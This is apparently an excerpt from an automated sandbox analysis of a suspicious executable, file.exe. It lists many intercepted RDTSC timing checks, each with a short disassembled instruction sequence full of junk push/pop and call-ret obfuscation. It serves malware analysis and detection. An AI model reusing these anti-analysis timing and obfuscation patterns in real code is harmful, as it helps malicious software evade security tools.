Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CCF3 second address: 75CD83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8EA4C24F98h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007F8EA4C24F9Fh 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F8EA4C24F98h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 cmc 0x00000055 mov eax, dword ptr [ebp+122D0C29h] 0x0000005b mov dword ptr [ebp+122D2C6Ch], esi 0x00000061 push FFFFFFFFh 0x00000063 movzx ebx, di 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push ebx 0x0000006b pop ebx 0x0000006c push ebx 0x0000006d pop ebx 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CD83 second address: 75CD95 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA53EA358h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75AC6E second address: 75AC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CD95 second address: 75CD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75AC72 second address: 75AC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75ECE1 second address: 75ECE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75CD9B second address: 75CDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75ECE5 second address: 75ECEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761960 second address: 761994 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F8EA4C24F96h 0x00000011 jns 00007F8EA4C24F96h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8EA4C24FA8h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 761994 second address: 7619E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA35Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov dword ptr [ebp+12454C96h], ebx 0x00000011 popad 0x00000012 mov dword ptr [ebp+122D2222h], eax 0x00000018 push 00000000h 0x0000001a jmp 00007F8EA53EA35Ah 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F8EA53EA358h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7619E9 second address: 7619EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762A5C second address: 762A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 762A62 second address: 762A85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8EA4C24FA8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 763DE1 second address: 763DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766ADB second address: 766ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764E57 second address: 764E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766ADF second address: 766AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 764E5B second address: 764E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766AE3 second address: 766AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766AE9 second address: 766AFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767A36 second address: 767A5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766DE3 second address: 766DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8EA53EA356h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 768A13 second address: 768A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767BD3 second address: 767BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767CDC second address: 767CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8EA4C24F96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 768B80 second address: 768B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA53EA360h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 768B99 second address: 768B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 768B9D second address: 768BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8EA53EA368h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F346 second address: 76F34A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F34A second address: 76F352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F352 second address: 76F35C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8EA4C24F96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76F518 second address: 76F51C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7753C4 second address: 5A1B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2B8EDE61h 0x00000010 stc 0x00000011 push dword ptr [ebp+122D01E1h] 0x00000017 jmp 00007F8EA4C24FA4h 0x0000001c call dword ptr [ebp+122D20C4h] 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D1C59h], ebx 0x00000029 xor eax, eax 0x0000002b jno 00007F8EA4C24FA6h 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007F8EA4C24F9Bh 0x0000003a mov dword ptr [ebp+122D38DBh], eax 0x00000040 jmp 00007F8EA4C24F9Dh 0x00000045 pushad 0x00000046 xor edx, dword ptr [ebp+122D372Bh] 0x0000004c sbb si, E600h 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 stc 0x00000058 add dword ptr [ebp+122D2B8Ah], edi 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 mov dx, cx 0x00000066 mov dword ptr [ebp+122D2B8Ah], edi 0x0000006c popad 0x0000006d mov dword ptr [ebp+122D1C59h], edx 0x00000073 lodsw 0x00000075 jmp 00007F8EA4C24F9Eh 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e jmp 00007F8EA4C24FA5h 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 jmp 00007F8EA4C24FA5h 0x0000008c nop 0x0000008d pushad 0x0000008e jnc 00007F8EA4C24F98h 0x00000094 push eax 0x00000095 push edx 0x00000096 ja 00007F8EA4C24F96h 0x0000009c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77688B second address: 776891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776891 second address: 77689A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70B952 second address: 70B98E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8EA53EA35Ch 0x00000008 pop ebx 0x00000009 jnl 00007F8EA53EA362h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F8EA53EA36Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8EA53EA35Eh 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C312 second address: 77C316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77C5FF second address: 77C60B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8EA53EA356h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CE37 second address: 77CE73 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jno 00007F8EA4C24F96h 0x00000013 jmp 00007F8EA4C24FA9h 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007F8EA4C24F96h 0x00000026 push esi 0x00000027 pop esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CE73 second address: 77CE84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA35Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77CE84 second address: 77CE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8EA4C24F96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7157DF second address: 7157E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7157E5 second address: 7157E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7157E9 second address: 7157F5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8EA53EA356h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7830D6 second address: 7830E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F8EA4C24F96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78323A second address: 783264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8EA53EA368h 0x0000000d je 00007F8EA53EA366h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783264 second address: 78326A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7833BA second address: 7833CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F8EA53EA35Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7833CD second address: 7833DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F8EA4C24F96h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7833DA second address: 7833E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7833E0 second address: 7833E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7833E6 second address: 7833F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7837FD second address: 783804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783804 second address: 78382F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F8EA53EA36Eh 0x0000000f jnl 00007F8EA53EA358h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78382F second address: 783833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78294A second address: 78296E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007F8EA53EA364h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7563DF second address: 7563E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7563E3 second address: 735BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F8EA53EA358h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2BBFh] 0x0000002a call dword ptr [ebp+122D2D6Eh] 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7564E7 second address: 7564EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756BE5 second address: 756BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7573AF second address: 7573C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7573C1 second address: 75743E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8EA53EA35Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F8EA53EA358h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 0000001Eh 0x0000002a jmp 00007F8EA53EA361h 0x0000002f jnc 00007F8EA53EA35Bh 0x00000035 nop 0x00000036 jnp 00007F8EA53EA35Eh 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F8EA53EA35Dh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75768F second address: 7576E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8EA4C24FA5h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F8EA4C24FA0h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F8EA4C24FA9h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7576E0 second address: 7576E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7576E4 second address: 7576EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7577CB second address: 7577D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8EA53EA356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7577D5 second address: 7577D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B093 second address: 78B099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B099 second address: 78B0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B214 second address: 78B218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E731 second address: 78E739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E739 second address: 78E764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jo 00007F8EA53EA356h 0x0000000e jmp 00007F8EA53EA369h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78E764 second address: 78E76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 793129 second address: 79313A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F8EA53EA356h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79313A second address: 79313E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79270B second address: 79274F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jmp 00007F8EA53EA360h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007F8EA53EA35Eh 0x00000014 pop ebx 0x00000015 jmp 00007F8EA53EA362h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798AF5 second address: 798B1C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8EA4C24FA1h 0x0000000c jo 00007F8EA4C24F96h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F8EA4C24F96h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798B1C second address: 798B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798B20 second address: 798B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F8EA4C24FA3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798B40 second address: 798B4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F8EA53EA356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798B4C second address: 798B51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B273 second address: 79B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79B674 second address: 79B691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F8EA4C24F96h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DB8E second address: 79DB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8EA53EA356h 0x0000000a rdtsc
